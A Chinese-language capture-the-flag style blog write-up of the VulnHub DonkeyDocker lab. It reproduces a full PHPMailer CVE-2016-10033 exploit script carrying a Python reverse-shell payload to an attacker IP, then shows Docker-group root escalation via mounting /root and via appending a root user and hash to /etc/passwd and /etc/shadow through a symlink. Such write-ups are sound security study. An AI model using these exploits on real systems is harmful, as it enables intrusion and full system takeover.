MY_BLOG
https://xyaxxya.github.io/2024/04/13/DonkeyDocker-v1-0渗透思路/
date: 2024-04-13 19:15:10
tags:
- 内网渗透
- Dockerfile
categories:
-
- 内网渗透
- vulnhub
靶机下载地址
https://www.vulnhub.com/entry/donkeydocker-1,189/
靶机IP:
192.168.100.134
查看端口,扫描目录
查看页面
刚才用的是
feroxbuster -u http://192.168.100.134
不太给力,换个字典再看看
+ http://192.168.100.134/mailer/extras/admin.php (CODE:301|SIZE:331)
+ http://192.168.100.134/mailer/extras/index.php (CODE:301|SIZE:331)
+ http://192.168.100.134/mailer/extras/info.php (CODE:301|SIZE:330)
+ http://192.168.100.134/mailer/extras/phpinfo.php (CODE:301|SIZE:333)
+ http://192.168.100.134/mailer/extras/xmlrpc.php (CODE:301|SIZE:332)
+ http://192.168.100.134/mailer/extras/xmlrpc_server.php (CODE:301|SIZE:339)
---- Entering directory: http://192.168.100.134/mailer/language/ ----
+ http://192.168.100.134/mailer/language/admin.php (CODE:301|SIZE:333)
+ http://192.168.100.134/mailer/language/index.php (CODE:301|SIZE:333)
+ http://192.168.100.134/mailer/language/info.php (CODE:301|SIZE:332)
+ http://192.168.100.134/mailer/language/phpinfo.php (CODE:301|SIZE:335)
+ http://192.168.100.134/mailer/language/xmlrpc.php (CODE:301|SIZE:334)
+ http://192.168.100.134/mailer/language/xmlrpc_server.php (CODE:301|SIZE:341)
---- Entering directory: http://192.168.100.134/mailer/test/ ----
+ http://192.168.100.134/mailer/test/admin.php (CODE:301|SIZE:329)
+ http://192.168.100.134/mailer/test/index.php (CODE:301|SIZE:329)
+ http://192.168.100.134/mailer/test/info.php (CODE:301|SIZE:328)
+ http://192.168.100.134/mailer/test/phpinfo.php (CODE:301|SIZE:331)
+ http://192.168.100.134/mailer/test/xmlrpc.php (CODE:301|SIZE:330)
+ http://192.168.100.134/mailer/test/xmlrpc_server.php (CODE:301|SIZE:337)
---- Entering directory: http://192.168.100.134/mailer/examples/images/ ----
+ http://192.168.100.134/mailer/examples/images/admin.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/images/index.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/images/info.php (CODE:301|SIZE:339)
+ http://192.168.100.134/mailer/examples/images/phpinfo.php (CODE:301|SIZE:342)
+ http://192.168.100.134/mailer/examples/images/xmlrpc.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/images/xmlrpc_server.php (CODE:301|SIZE:348)
---- Entering directory: http://192.168.100.134/mailer/examples/scripts/ ----
+ http://192.168.100.134/mailer/examples/scripts/admin.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/scripts/index.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/scripts/info.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/scripts/phpinfo.php (CODE:301|SIZE:343)
+ http://192.168.100.134/mailer/examples/scripts/xmlrpc.php (CODE:301|SIZE:342)
+ http://192.168.100.134/mailer/examples/scripts/xmlrpc_server.php (CODE:301|SIZE:349)
---- Entering directory: http://192.168.100.134/mailer/examples/styles/ ----
+ http://192.168.100.134/mailer/examples/styles/admin.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/styles/index.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/styles/info.php (CODE:301|SIZE:339)
+ http://192.168.100.134/mailer/examples/styles/phpinfo.php (CODE:301|SIZE:342)
+ http://192.168.100.134/mailer/examples/styles/xmlrpc.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/styles/xmlrpc_server.php (CODE:301|SIZE:348)
-----------------
END_TIME: Sat Apr 13 07:32:54 2024
DOWNLOADED: 73792 - FOUND: 103
选择http://192.168.100.134/mailer/examples/登录
登录http://192.168.100.134/mailer/examples/查看
google一下发现http://192.168.100.134/mailer/VERSION
可以查询版本
google一下
https://exploit-db.com/exploits/40974
"""
# 漏洞标题:PHPMailer 漏洞 v1.0
# 日期:2016 年 12 月 29 日
# 利用作者:Daniel aka anarc0der
# 版本:PHPMailer < 5.2.18
# 测试环境:Arch Linux
# CVE:CVE 2016-10033
描述:
通过目标的反向连接(反向 shell)来利用 PHPMail
用法:
1 - 下载 docker 易受攻击的环境:https://github.com/opsxcq/exploit-CVE-2016-10033
2 - 在有效负载变量上配置反向 shell 的 IP
4 - 在一个终端中打开 nc 监听器: $ nc -lnvp <your ip>
3 - 打开其他终端并运行漏洞利用程序:python3 anarcoder.py
视频 PoC:https://www.youtube.com/watch?v=DXeZxKr-qsU
完整咨询:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec
下载代码后修改:
- 打开文件并在开头添加" #coding:utf-8 "。
- 设置target = 'http://192.168.100.134' (受害者IP) ,这是backdoor.php在受害者机器中自动上传的位置。
- 在有效负载代码中提供攻击者 IP:192.168.100.251(Kali Linux IP)
- 进行上述更改后保存。
然后pip2 install requests_toolbelt
一边监听一边运行即可
或者msf里也有脚本
msf6 > searchsploit phpmail
[*] exec: searchsploit phpmail
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service | php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution | php/webapps/40968.sh
PHPMailer < 5.2.18 - Remote Code Execution | php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution | php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution | php/webapps/40969.py
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution | php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure | php/webapps/43056.py
WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit) | php/remote/42024.rb
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
下载到当前页面
#coding:utf-8
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
target = 'http://192.168.100.134'
backdoor = '/test.php'
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.100.251\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
'name': payload,
'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/test.php server\" @protonmail.com',
'message': 'Pwned'}
m = MultipartEncoder(fields=fields,
boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
headers={'User-Agent': 'curl/7.47.0',
'Content-Type': m.content_type}
proxies = {'http': '192.168.100.251', 'https':'192.168.100.251'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
print('[+] ExPLoITeD ' + target)
实验后发现target中不需要添加contact界面,这样添加的webshell就会在IP/backdoor.php
至于proxy需不需要修改,我没试过
test是我自己测试用的
运行后访问backdoor.php即可反弹shell
/bin/sh: 0: can't access tty; job control turned off
返回netcat shell,在这里会发现它已连接到受害者,但无法访问受害者系统的正确 shell,因此,输入给定的命令以便正确访问受害者 shell
python升级shell
python -c 'import pty;pty.spawn("/bin/bash")'
先看看有suid权限的
没什么收获
# Start apache
source /etc/apache2/envvars
a2enmod rewrite
apachectl -f /etc/apache2/apache2.conf
sleep 3
tail -f /var/log/apache2/*&
# Start our fake smtp server
python -m smtpd -n -c DebuggingServer localhost:25
www-data@12081bd067cc:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
smmta:x:104:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:105:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
smith:x:1000:100::/home/smith:/bin/bash
发现Smith,尝试登录,弱口令进了
用户目录发现一个flag
似乎是指向orwell@donkeydocker 的私钥。
复制到id_rsa登录
chmod 600 id_rsa
ssh -i id_rsa orwell@192.168.100.134
获得第二个flag
属于docker组,列出所有容器。这下知道main.sh的作用了吧
#!/bin/bash
# change permission
chown smith:users /home/smith/flag.txt
# Start apache
source /etc/apache2/envvars
a2enmod rewrite
apachectl -f /etc/apache2/apache2.conf
sleep 3
tail -f /var/log/apache2/*&
# Start our fake smtp server
python -m smtpd -n -c DebuggingServer localhost:25
法一:
docker run -v /root:/hack -t debian:jessie /bin/sh -c 'ls -al /hack'
docker run -v /root:/hack -t debian:jessie /bin/sh -c 'cat /hack/flag.txt'
简单的说就是新建了一个debian容器,其中的hack目录映射到本地的root目录,-c后面跟随的字符串是要在 Shell 中执行的命令。
debian
是镜像的名称,jessie
是 Debian 发行版的一个老版本的代号,作为镜像的标签,Docker 将使用这个镜像来创建容器。
法二(no flag)
我们在shell端创建一个软连接到/etc/psswd
cd /home/smith
mv flag.txt flag.txt.bak
ln -s /etc/passwd flag.txt
ssh端重启docker
会杀死原来的会话,重新创建即可
创建root用户即可
www-data@12081bd067cc:/www$ echo 'yiyi:x:0:0::/root:/bin/bash' >> flag.txt
echo 'yiyi:x:0:0::/root:/bin/bash' >> flag.txt
同样的操作对shadow
rm flag.txt
ln -s /etc/shadow flag.txt
重启docker
echo 'reedphish:R2JhrPXIXqW3g:17251:0:99999:7:::' >> flag.txt
su yiyi
ls -al /root
密码smith
登录后发现找不到flag!
法三
类法一
创建一个hack目录,在里面写dockerfile
touch Dockerfile
Dockerfile内容
FROM alpine:3.3
# Alpine is nice!
ENV WORKDIR /hack
RUN mkdir -p $WORKDIR
VOLUME [$WORKDIR]
WORKDIR $WORKDIR
构建
docker build -t hackerimage .
docker run -v /root:/hack -t hackerimage /bin/sh -c 'ls -la'
docker run -v /root:/hack -t hackerimage /bin/sh -c 'cat flag.txt'
完